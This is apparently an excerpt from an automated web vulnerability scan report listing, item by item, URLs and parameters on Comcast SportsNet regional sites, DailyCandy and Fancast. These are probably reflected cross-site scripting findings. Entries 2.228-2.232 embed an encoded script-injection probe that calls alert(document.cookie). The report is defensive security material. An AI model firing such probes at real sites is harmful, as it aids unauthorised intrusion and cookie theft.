2.182. http://www.comcastsportsnet.com/common/js/aggregate.js [REST URL parameter 3]

2.183. http://www.comcastsportsnet.com/pages/main [REST URL parameter 1]

2.184. http://www.comcastsportsnet.com/pages/main [REST URL parameter 2]

2.185. http://www.csnbaltimore.com/12/01/10/Terps-Hope-Final-Win-Leads-To-Strong-Bow/landing.html [REST URL parameter 5]

2.186. http://www.csnbaltimore.com/12/10/10/Anquan-Boldin-the-anti-Derrick-Mason/landing.html [REST URL parameter 5]

2.187. http://www.csnbaltimore.com/12/11/10/Navy-beats-Army-extends-streak-to-nine/landing.html [REST URL parameter 5]

2.188. http://www.csnbaltimore.com/12/12/10/Ravens-Texans-The-basics/landing.html [REST URL parameter 5]

2.189. http://www.csnbaltimore.com/12/16/10/Franklin-finally-heads-to-Vandy/landing.html [REST URL parameter 5]

2.190. http://www.csnbaltimore.com/12/16/10/New-sports-arena-for-Baltimore-/landing.html [REST URL parameter 5]

2.191. http://www.csnbaltimore.com/12/16/10/Will-Ravens-respond-to-Saints/landing.html [REST URL parameter 5]

2.192. http://www.csnbaltimore.com/12/17/10/Brady-Hoke-talks-about-prepping-to-face-/landing.html [REST URL parameter 5]

2.193. http://www.csnbaltimore.com/12/17/10/Cliff-Lee-quartet-no-match-for-1971-Orio/landing.html [REST URL parameter 5]

2.194. http://www.csnbaltimore.com/12/17/10/Eisenberg-Saints-test-jazzes-Ravens/landing.html [REST URL parameter 5]

2.195. http://www.csnbaltimore.com/12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html [REST URL parameter 5]

2.196. http://www.csnbaltimore.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 5]

2.197. http://www.csnbaltimore.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 5]

2.198. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 1]

2.199. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 2]

2.200. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 3]

2.201. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 4]

2.202. http://www.csnbaltimore.com/common/js/aggregate.js [REST URL parameter 3]

2.203. http://www.csnbaltimore.com/favicon.ico [REST URL parameter 1]

2.204. http://www.csnbaltimore.com/pages/landing [REST URL parameter 1]

2.205. http://www.csnbaltimore.com/pages/landing [REST URL parameter 2]

2.206. http://www.csnbaltimore.com/pages/landing [name of an arbitrarily supplied request parameter]

2.207. http://www.csnbaltimore.com/pages/main [REST URL parameter 1]

2.208. http://www.csnbaltimore.com/pages/main [REST URL parameter 2]

2.209. http://www.csnbaltimore.com/pages/main [name of an arbitrarily supplied request parameter]

2.210. http://www.csnbaltimore.com/pages/profiles [REST URL parameter 1]

2.211. http://www.csnbaltimore.com/pages/profiles [REST URL parameter 2]

2.212. http://www.csnbaltimore.com/pages/profiles [name of an arbitrarily supplied request parameter]

2.213. http://www.csnbaltimore.com/pages/video [REST URL parameter 1]

2.214. http://www.csnbaltimore.com/pages/video [REST URL parameter 2]

2.215. http://www.csnbaltimore.com/pages/video [name of an arbitrarily supplied request parameter]

2.216. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 1]

2.217. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 2]

2.218. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 3]

2.219. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 4]

2.220. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 1]

2.221. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 2]

2.222. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 3]

2.223. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 4]

2.224. http://www.csnbayarea.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 1]

2.225. http://www.csnbayarea.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 2]

2.226. http://www.csnbayarea.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 3]

2.227. http://www.csnbayarea.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 4]

2.228. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 1]

2.229. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 2]

2.230. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 3]

2.231. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 4]

2.232. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 5]

2.233. http://www.csnbayarea.com/pages/landing [name of an arbitrarily supplied request parameter]

2.234. http://www.csnbayarea.com/pages/profiles [name of an arbitrarily supplied request parameter]

2.235. http://www.csnbayarea.com/pages/video [name of an arbitrarily supplied request parameter]

2.236. http://www.csncalifornia.com/ [name of an arbitrarily supplied request parameter]

2.237. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [REST URL parameter 1]

2.238. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [REST URL parameter 2]

2.239. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [REST URL parameter 3]

2.240. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [REST URL parameter 4]

2.241. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [name of an arbitrarily supplied request parameter]

2.242. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [REST URL parameter 1]

2.243. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [REST URL parameter 2]

2.244. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [REST URL parameter 3]

2.245. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [REST URL parameter 4]

2.246. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [name of an arbitrarily supplied request parameter]

2.247. http://www.csncalifornia.com/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html [REST URL parameter 1]

2.248. http://www.csncalifornia.com/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html [REST URL parameter 2]

2.249. http://www.csncalifornia.com/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html [REST URL parameter 3]

2.250. http://www.csncalifornia.com/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html [REST URL parameter 4]

2.251. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [REST URL parameter 1]

2.252. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [REST URL parameter 2]

2.253. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [REST URL parameter 3]

2.254. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [REST URL parameter 4]

2.255. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [name of an arbitrarily supplied request parameter]

2.256. http://www.csncalifornia.com/12/16/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html [REST URL parameter 1]

2.257. http://www.csncalifornia.com/12/16/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html [REST URL parameter 2]

2.258. http://www.csncalifornia.com/12/16/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html [REST URL parameter 3]

2.259. http://www.csncalifornia.com/12/16/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html [REST URL parameter 4]

2.260. http://www.csncalifornia.com/12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html [REST URL parameter 1]

2.261. http://www.csncalifornia.com/12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html [REST URL parameter 2]

2.262. http://www.csncalifornia.com/12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html [REST URL parameter 3]

2.263. http://www.csncalifornia.com/12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html [REST URL parameter 4]

2.264. http://www.csncalifornia.com/12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html [name of an arbitrarily supplied request parameter]

2.265. http://www.csncalifornia.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 1]

2.266. http://www.csncalifornia.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 2]

2.267. http://www.csncalifornia.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 3]

2.268. http://www.csncalifornia.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 4]

2.269. http://www.csncalifornia.com/12/17/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html [REST URL parameter 1]

2.270. http://www.csncalifornia.com/12/17/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html [REST URL parameter 2]

2.271. http://www.csncalifornia.com/12/17/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html [REST URL parameter 3]

2.272. http://www.csncalifornia.com/12/17/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html [REST URL parameter 4]

2.273. http://www.csncalifornia.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 1]

2.274. http://www.csncalifornia.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 2]

2.275. http://www.csncalifornia.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 3]

2.276. http://www.csncalifornia.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 4]

2.277. http://www.csncalifornia.com/12/17/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html [REST URL parameter 1]

2.278. http://www.csncalifornia.com/12/17/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html [REST URL parameter 2]

2.279. http://www.csncalifornia.com/12/17/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html [REST URL parameter 3]

2.280. http://www.csncalifornia.com/12/17/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html [REST URL parameter 4]

2.281. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html [REST URL parameter 1]

2.282. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html [REST URL parameter 2]

2.283. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html [REST URL parameter 3]

2.284. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html [REST URL parameter 4]

2.285. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html [name of an arbitrarily supplied request parameter]

2.286. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html [REST URL parameter 1]

2.287. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html [REST URL parameter 2]

2.288. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html [REST URL parameter 3]

2.289. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html [REST URL parameter 4]

2.290. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html [name of an arbitrarily supplied request parameter]

2.291. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html [REST URL parameter 1]

2.292. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html [REST URL parameter 2]

2.293. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html [REST URL parameter 3]

2.294. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html [REST URL parameter 4]

2.295. http://www.csncalifornia.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 1]

2.296. http://www.csncalifornia.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 2]

2.297. http://www.csncalifornia.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 3]

2.298. http://www.csncalifornia.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 4]

2.299. http://www.csncalifornia.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [name of an arbitrarily supplied request parameter]

2.300. http://www.csncalifornia.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 1]

2.301. http://www.csncalifornia.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 2]

2.302. http://www.csncalifornia.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 3]

2.303. http://www.csncalifornia.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 4]

2.304. http://www.csncalifornia.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [name of an arbitrarily supplied request parameter]

2.305. http://www.csncalifornia.com/pages/profiles [name of an arbitrarily supplied request parameter]

2.306. http://www.csncalifornia.com/pages/video [name of an arbitrarily supplied request parameter]

2.307. http://www.csnchicago.com/12/12/10/Blackhawks-Bowman-opens-up-to-CSNs-Boden/landing.html [REST URL parameter 5]

2.308. http://www.csnchicago.com/12/15/10/Noah-needs-surgery-could-miss-10-weeks/landing_bulls.html [REST URL parameter 5]

2.309. http://www.csnchicago.com/12/16/10/Ginobilis-UFO-Sighting-Explained/landing_word_bball.html [REST URL parameter 5]

2.310. http://www.csnchicago.com/12/16/10/bHawks-911bbrKane-Hossa-etc-Hawks-using-/landing.html [REST URL parameter 5]

2.311. http://www.csnchicago.com/12/17/10/Bears-to-practice-at-Northwestern-to-pre/landing_insider_john_moon_mullin.html [REST URL parameter 5]

2.312. http://www.csnchicago.com/12/17/10/Bears-to-practice-at-Nortwestern-to-prep/landing_insider_john_moon_mullin.html [REST URL parameter 5]

2.313. http://www.csnchicago.com/12/17/10/Greinke-Can-Block-Trade-to-15-Teams/landing_word_baseball.html [REST URL parameter 5]

2.314. http://www.csnchicago.com/12/17/10/Hawks-honor-Chris-Chelios-on-heritage-ni/landing_insider_tracey_myers.html [REST URL parameter 5]

2.315. http://www.csnchicago.com/12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html [REST URL parameter 5]

2.316. http://www.csnchicago.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 5]

2.317. http://www.csnchicago.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 5]

2.318. http://www.csnchicago.com/common/global_flash/player/player.php [REST URL parameter 1]

2.319. http://www.csnchicago.com/common/global_flash/player/player.php [REST URL parameter 2]

2.320. http://www.csnchicago.com/common/global_flash/player/player.php [REST URL parameter 3]

2.321. http://www.csnchicago.com/common/global_flash/player/player.php [REST URL parameter 4]

2.322. http://www.csnchicago.com/common/js/aggregate.js [REST URL parameter 3]

2.323. http://www.csnchicago.com/pages/video [REST URL parameter 1]

2.324. http://www.csnchicago.com/pages/video [REST URL parameter 2]

2.325. http://www.csnchicago.com/pages/video [name of an arbitrarily supplied request parameter]

2.326. http://www.csnne.com/12/16/10/Mom-Theyre-picking-on-Curran/v1_landing.html [REST URL parameter 5]

2.327. http://www.csnne.com/12/16/10/NFL-Picks-Week-15/landing_insider_levine.html [REST URL parameter 5]

2.328. http://www.csnne.com/12/16/10/Patriots-dont-let-injuries-stop-them/landing_patriots.html [REST URL parameter 5]

2.329. http://www.csnne.com/12/16/10/Same-old-same-old/landing_heyfelger.html [REST URL parameter 5]

2.330. http://www.csnne.com/12/16/10/The-un-firing-of-Brian-Cashman/v1_landing.html [REST URL parameter 5]

2.331. http://www.csnne.com/12/17/10/Antoine-Walkers-not-a-Maine-man/landing_insider_levine.html [REST URL parameter 5]

2.332. http://www.csnne.com/12/17/10/Give-it-a-rest-Rajon/landing_wakeup.html [REST URL parameter 5]

2.333. http://www.csnne.com/12/17/10/Jenks-ex-coach-thinks-hell-shine-with-Re/landing_redsox.html [REST URL parameter 5]

2.334. http://www.csnne.com/12/17/10/Minnesota-collapse-Its-all-Favres-fault-/landing_wgs.html [REST URL parameter 5]

2.335. http://www.csnne.com/12/17/10/Robinson-at-point-guard-will-be-a-learni/landing_celtics.html [REST URL parameter 5]

2.336. http://www.csnne.com/12/17/10/Woodhead-incognito-on-sales-floor/landing_wgs.html [REST URL parameter 5]

2.337. http://www.csnne.com/12/18/10/Another-day-another-injured-Celtic/landing.html [REST URL parameter 5]

2.338. http://www.csnne.com/12/18/10/Bradley-ready-for-his-turn-with-Celtics/landing_celtics.html [REST URL parameter 5]

2.339. http://www.csnne.com/12/18/10/Bruins-hold-on-to-defeat-Capitals-3-2/v1_landing_bruins.html [REST URL parameter 5]

2.340. http://www.csnne.com/12/18/10/Confirmed-Red-Sox-sign-Dan-Wheeler/landing_redsox.html [REST URL parameter 5]

2.341. http://www.csnne.com/12/18/10/Felgers-Four-Keys-to-the-game/insider_felger.html [REST URL parameter 5]

2.342. http://www.csnne.com/12/18/10/NE-college-basketball-results-Saturday-D/landing.html [REST URL parameter 5]

2.343. http://www.csnne.com/12/18/10/NE-college-hockey-results-Saturday-Decem/landing.html [REST URL parameter 5]

2.344. http://www.csnne.com/12/18/10/Not-feeling-himself-Thomas-saves-day-for/v1_landing_bruins.html [REST URL parameter 5]

2.345. http://www.csnne.com/12/18/10/Not-feeling-himself-Thomas-saves-the-day/v1_landing_bruins.html [REST URL parameter 5]

2.346. http://www.csnne.com/12/18/10/ONeals-Christmas-wish-To-play-before-the/landing_celtics.html [REST URL parameter 5]

2.347. http://www.csnne.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 5]

2.348. http://www.csnne.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 5]

2.349. http://www.csnne.com/common/FB/xd_receiver.htm [REST URL parameter 1]

2.350. http://www.csnne.com/common/FB/xd_receiver.htm [REST URL parameter 2]

2.351. http://www.csnne.com/common/FB/xd_receiver.htm [REST URL parameter 3]

2.352. http://www.csnne.com/common/ad_count.php [REST URL parameter 1]

2.353. http://www.csnne.com/common/ad_count.php [REST URL parameter 2]

2.354. http://www.csnne.com/common/global_flash/player/player.php [REST URL parameter 1]

2.355. http://www.csnne.com/common/global_flash/player/player.php [REST URL parameter 2]

2.356. http://www.csnne.com/common/global_flash/player/player.php [REST URL parameter 3]

2.357. http://www.csnne.com/common/global_flash/player/player.php [REST URL parameter 4]

2.358. http://www.csnne.com/common/js/aggregate.js [REST URL parameter 3]

2.359. http://www.csnne.com/pages/coldhardfootballfacts [REST URL parameter 1]

2.360. http://www.csnne.com/pages/coldhardfootballfacts [REST URL parameter 2]

2.361. http://www.csnne.com/pages/coldhardfootballfacts [name of an arbitrarily supplied request parameter]

2.362. http://www.csnne.com/pages/v3_sportsnetcentralupdate [REST URL parameter 1]

2.363. http://www.csnne.com/pages/v3_sportsnetcentralupdate [REST URL parameter 2]

2.364. http://www.csnne.com/pages/v3_sportsnetcentralupdate [name of an arbitrarily supplied request parameter]

2.365. http://www.csnne.com/pages/v3_video [REST URL parameter 1]

2.366. http://www.csnne.com/pages/v3_video [REST URL parameter 2]

2.367. http://www.csnne.com/pages/v3_video [name of an arbitrarily supplied request parameter]

2.368. http://www.csnne.com/pages/video [REST URL parameter 1]

2.369. http://www.csnne.com/pages/video [REST URL parameter 2]

2.370. http://www.csnne.com/pages/video [name of an arbitrarily supplied request parameter]

2.371. http://www.csnnw.com/common/ad_count.php [REST URL parameter 1]

2.372. http://www.csnnw.com/common/ad_count.php [REST URL parameter 2]

2.373. http://www.csnnw.com/common/dynrss/dynrss_5274_landing2_.rss [REST URL parameter 1]

2.374. http://www.csnnw.com/common/dynrss/dynrss_5274_landing2_.rss [REST URL parameter 2]

2.375. http://www.csnnw.com/common/dynrss/dynrss_5274_landing2_.rss [REST URL parameter 3]

2.376. http://www.csnnw.com/common/global_flash/player/player.php [REST URL parameter 1]

2.377. http://www.csnnw.com/common/global_flash/player/player.php [REST URL parameter 2]

2.378. http://www.csnnw.com/common/global_flash/player/player.php [REST URL parameter 3]

2.379. http://www.csnnw.com/common/global_flash/player/player.php [REST URL parameter 4]

2.380. http://www.csnnw.com/common/js/aggregate.js [REST URL parameter 3]

2.381. http://www.csnnw.com/favicon.ico [REST URL parameter 1]

2.382. http://www.csnnw.com/pages/landing2 [REST URL parameter 1]

2.383. http://www.csnnw.com/pages/landing2 [REST URL parameter 2]

2.384. http://www.csnnw.com/pages/landing2 [name of an arbitrarily supplied request parameter]

2.385. http://www.csnnw.com/pages/main [REST URL parameter 1]

2.386. http://www.csnnw.com/pages/main [REST URL parameter 2]

2.387. http://www.csnnw.com/pages/main [name of an arbitrarily supplied request parameter]

2.388. http://www.csnphilly.com/pages/pieceoftheaction [name of an arbitrarily supplied request parameter]

2.389. http://www.csnphilly.com/pages/video [name of an arbitrarily supplied request parameter]

2.390. http://www.csnwashington.com/12/16/10/Ginobilis-UFO-Sighting-Explained/landing_word_bball.html [REST URL parameter 5]

2.391. http://www.csnwashington.com/12/17/10/Caps-Green-Were-going-to-be-alright/landing.html [REST URL parameter 5]

2.392. http://www.csnwashington.com/12/17/10/McNabb-benched-Grossman-to-start-Sunday/landing.html [REST URL parameter 5]

2.393. http://www.csnwashington.com/12/17/10/McNabb-benched-Grossman-to-start-vs-Dall/landing.html [REST URL parameter 5]

2.394. http://www.csnwashington.com/12/17/10/McSorley-Named-Dirtiest-Player-Ever/landing_word_hockey.html [REST URL parameter 5]

2.395. http://www.csnwashington.com/12/17/10/Redskins-Grossman-ready-for-opportunity/landing.html [REST URL parameter 5]

2.396. http://www.csnwashington.com/12/17/10/Report-Friedgen-accepts-Marylands-buy-ou/landing.html [REST URL parameter 5]

2.397. http://www.csnwashington.com/12/17/10/Suggs-Brees-is-Better-Than-Brady/landing_word_fball.html [REST URL parameter 5]

2.398. http://www.csnwashington.com/12/17/10/Vick-says-he-would-like-a-pet-dog/wordonthestreet.html [REST URL parameter 5]

2.399. http://www.csnwashington.com/12/18/10/Beninati-Fault-in-first/landing_joeb.html [REST URL parameter 5]

2.400. http://www.csnwashington.com/12/18/10/Bruins-score-3-quickly-hold-on-to-beat-C/landing.html [REST URL parameter 5]

2.401. http://www.csnwashington.com/12/18/10/Hanrahan-Arenas-trade-was-long-overdue/landing.html [REST URL parameter 5]

2.402. http://www.csnwashington.com/12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html [REST URL parameter 5]

2.403. http://www.csnwashington.com/12/19/10/Redskins-Cowboys-game-chat-on-now/landing.html [REST URL parameter 5]

2.404. http://www.csnwashington.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 5]

2.405. http://www.csnwashington.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 5]

2.406. http://www.csnwashington.com/common/global_flash/player/player.php [REST URL parameter 1]

2.407. http://www.csnwashington.com/common/global_flash/player/player.php [REST URL parameter 2]

2.408. http://www.csnwashington.com/common/global_flash/player/player.php [REST URL parameter 3]

2.409. http://www.csnwashington.com/common/global_flash/player/player.php [REST URL parameter 4]

2.410. http://www.csnwashington.com/common/js/aggregate.js [REST URL parameter 3]

2.411. http://www.csnwashington.com/favicon.ico [REST URL parameter 1]

2.412. http://www.csnwashington.com/pages/photos [REST URL parameter 1]

2.413. http://www.csnwashington.com/pages/photos [REST URL parameter 2]

2.414. http://www.csnwashington.com/pages/photos [name of an arbitrarily supplied request parameter]

2.415. http://www.csnwashington.com/pages/video [REST URL parameter 1]

2.416. http://www.csnwashington.com/pages/video [REST URL parameter 2]

2.417. http://www.csnwashington.com/pages/video [name of an arbitrarily supplied request parameter]

2.418. http://www.csnwashington.com/pages/videoembed [REST URL parameter 1]

2.419. http://www.csnwashington.com/pages/videoembed [REST URL parameter 2]

2.420. http://www.csnwashington.com/pages/videoembed [name of an arbitrarily supplied request parameter]

2.421. http://www.csssports.com/common/ad_count.php [REST URL parameter 1]

2.422. http://www.csssports.com/common/ad_count.php [REST URL parameter 2]

2.423. http://www.csssports.com/common/dynrss/dynrss_3242_landing_.rss [REST URL parameter 1]

2.424. http://www.csssports.com/common/dynrss/dynrss_3242_landing_.rss [REST URL parameter 2]

2.425. http://www.csssports.com/common/dynrss/dynrss_3242_landing_.rss [REST URL parameter 3]

2.426. http://www.csssports.com/common/global_flash/player/player.php [REST URL parameter 1]

2.427. http://www.csssports.com/common/global_flash/player/player.php [REST URL parameter 2]

2.428. http://www.csssports.com/common/global_flash/player/player.php [REST URL parameter 3]

2.429. http://www.csssports.com/common/global_flash/player/player.php [REST URL parameter 4]

2.430. http://www.csssports.com/common/js/aggregate.js [REST URL parameter 3]

2.431. http://www.csssports.com/pages/landing/ [REST URL parameter 1]

2.432. http://www.csssports.com/pages/landing/ [REST URL parameter 2]

2.433. http://www.csssports.com/pages/landing/ [name of an arbitrarily supplied request parameter]

2.434. http://www.csssports.com/pages/landing_09 [REST URL parameter 1]

2.435. http://www.csssports.com/pages/landing_09 [REST URL parameter 2]

2.436. http://www.csssports.com/pages/landing_09 [name of an arbitrarily supplied request parameter]

2.437. http://www.csssports.com/pages/main [REST URL parameter 1]

2.438. http://www.csssports.com/pages/main [REST URL parameter 2]

2.439. http://www.csssports.com/pages/main [name of an arbitrarily supplied request parameter]

2.440. http://www.dailycandy.com/atlanta/article/94262/5-Gifts-for-Homebodies [REST URL parameter 4]

2.441. http://www.dailycandy.com/dallas/article/94178/Artsy-Gifts-Shopping-at-Nest [REST URL parameter 4]

2.442. http://www.dailycandy.com/los-angeles/article/94180/Los-Angeles-Events-and-Diversions [REST URL parameter 4]

2.443. http://www.dailycandy.com/new-york/article/94172/Custom-Family-Crests [REST URL parameter 4]

2.444. http://www.dailycandy.com/washington-dc/article/94234/5-Gifts-for-Art-Fanatics [REST URL parameter 4]

2.445. http://www.exercisetv.tv/workout-videos/all/ [REST URL parameter 2]

2.446. http://www.fancast.com/blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/ [REST URL parameter 3]

2.447. http://www.fancast.com/blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/ [REST URL parameter 3]

2.448. http://www.fancast.com/blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/ [name of an arbitrarily supplied request parameter]

2.449. http://www.fancast.com/blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/ [name of an arbitrarily supplied request parameter]

2.450. http://www.fancast.com/blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/ [REST URL parameter 3]

2.451. http://www.fancast.com/blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/ [REST URL parameter 3]

2.452. http://www.fancast.com/blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/ [name of an arbitrarily supplied request parameter]

2.453. http://www.fancast.com/blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/ [name of an arbitrarily supplied request parameter]

